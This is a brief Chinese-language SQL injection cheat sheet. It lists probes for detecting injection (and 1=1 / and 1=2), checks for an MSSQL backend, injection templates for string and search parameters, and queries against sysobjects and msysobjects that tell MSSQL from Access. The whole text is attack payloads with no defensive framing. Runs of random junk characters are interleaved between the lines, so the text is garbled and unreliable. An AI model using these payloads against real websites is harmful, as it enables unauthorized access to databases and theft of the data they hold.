1.判断是否有注入;and 1=1 ;and 1=2 4G@vO{$
2.初步判断是否是mssql ;and user>0 ,ye>D='
%g0"Kj5
3.注入参数是字符'and [查询条件] and ''=' HHCsWe-
Fx0K.Q2Y0
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 8b(UqyV
;MCv
5.判断数据库系统 dj?.Hc7od
u-pE
;|
;and (select count(*) from sysobjects)>0 mssql A86#7
|>A1J:
;and (select count(*) from msysobjects)>0 access u$&